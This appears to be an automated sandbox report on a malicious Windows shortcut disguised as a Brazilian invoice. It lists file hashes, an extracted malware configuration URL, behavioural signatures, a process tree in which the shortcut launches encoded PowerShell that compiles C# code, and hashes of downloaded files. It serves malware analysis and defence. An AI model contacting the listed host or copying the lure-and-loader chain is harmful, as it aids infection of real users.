Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted: 20/09/2024, 20:53 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: NotaFiscal_Danfe_N43553454BR.lnk
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: NotaFiscal_Danfe_N43553454BR.lnk
  Resource: win10v2004-20240802-en
General
Target: NotaFiscal_Danfe_N43553454BR.lnk
Size: 2KB
MD5: c3996410f80fd3137feb0f42074c71ca
SHA1: 2da7caa8372ddb9e6601a029ed3d2128b5263b08
SHA256: 11718e47eee14d48ff490b5443e430607968f9a18d95272e72e128c0c97c6234
SHA512: a706a0cd9c1a0443476067221786518a46c614a91f0937f384c7e8068d2ed85ff05e243e964556b34fc4c363d7296d229a47db1a37e78382825cf4f37294cb78
Malware Config
Extracted
https://sepogy.epiain.com/v2/gl.php?aHR0cHM6Ly9zZXBvZ3kuZXBpYWluLmNvbS92Mnw2NDhR%
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2744  powershell.exe
  2744  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   2744  powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  description                      pid   Process         procid_target
  PID 2640 wrote to memory of 2744  2640  cmd.exe         31
  PID 2640 wrote to memory of 2744  2640  cmd.exe         31
  PID 2640 wrote to memory of 2744  2640  cmd.exe         31
  PID 2744 wrote to memory of 2576  2744  powershell.exe  32
  PID 2744 wrote to memory of 2576  2744  powershell.exe  32
  PID 2744 wrote to memory of 2576  2744  powershell.exe  32
  PID 2576 wrote to memory of 3016  2576  csc.exe         33
  PID 2576 wrote to memory of 3016  2576  csc.exe         33
  PID 2576 wrote to memory of 3016  2576  csc.exe         33
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\NotaFiscal_Danfe_N43553454BR.lnk
  PID: 2640
  - Suspicious use of WriteProcessMemory
  - [2] C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en …
    PID: 2744
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\orabdere.cmdline"
      PID: 2576
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4876.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4875.tmp"
        PID: 3016
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 2272bf3fbe8396f5d7857c1d1bfcfd91
  SHA1: 8dfd912cb7a13b3849821f66b4b4f9ded7359b73
  SHA256: 0a71415d4a404eeafa1015a35aeef09106e6bb7e83164a81181fffe7860c2087
  SHA512: a7e14ec8da5d50afb0a668511dc87233c71270c875a33e15f266b1b3dc27a0c8be1e656c6ff8d5f09932799a3a32a28bad9edc769fc618f759dc39e4779d88a2
- Filesize: 3KB
  MD5: 1a97587d8bcadd756967a8d69440e8a2
  SHA1: b39a5abcb8281119d0b82b9bd30814a463998681
  SHA256: 838c02ec76fcadef201351a326c96cb8cd0cdbe87c0b30c9beedbad6ea0c68cf
  SHA512: 141444319e5268fb8dc70116cbdeb47c5913680c5af8dee1bd0b049561684bed137c663c800e258be4304c3b84a345edcc3acc796298eba90ec88f5428f5a4e7
- Filesize: 7KB
  MD5: b1b57e1f54d073d9e6040c3d9ee8d48e
  SHA1: b200d3d9378e2c3fb0bd9640038412206c6eae21
  SHA256: d170fab5283b33d67d4644c3bf5c32758863271bf0377a3ed602dffe07947f04
  SHA512: 260896d63892c4c71af0d87560e185549fc933971c5611ef83a2588ac25348e42b1376a2cf3cec44419d3288373bf3d86029344ed536602083bf3db1915e2c28
- Filesize: 652B
  MD5: 640b2a30551bfe0d8ec7d66695c2b2dc
  SHA1: d4bd9ce277bf8b9608dc485f4e4edbd0acde65b3
  SHA256: 45952cf0d1195f632811d0874f978f18703f9498a9d7343562299dcaf635fd0d
  SHA512: 0e354fdfcc4989dc4539142c00ba3ede28bedc0a4481f9f79582e018b5c3fcbca3c182ff0d222488152503b90dd928c3401b073a759e085458939d043349aa7a
- Filesize: 187B
  MD5: 7b0e7177dfbb9edd1c1ef08b4fdfae2f
  SHA1: cb11a0252cdad66ec247312ccb7feb46456e52b6
  SHA256: 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
  SHA512: 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
- Filesize: 309B
  MD5: 6fbf3893d649e4b2cad7ac875cdcee53
  SHA1: 954dc1f600f078200b3c789c12f39c41c694d4af
  SHA256: 04d393ef7424994cfa3ff6fb47158976da4a6b83ceb2ee8be03dde7a8a5baaee
  SHA512: b055a582f124987f0ac0df4b84efac18a7a8e511ba56017bc89050dc5c2ae535ffee2c0376ba5da0f23b3522ebf6c13e403d38961f9734d44f807edeee09e154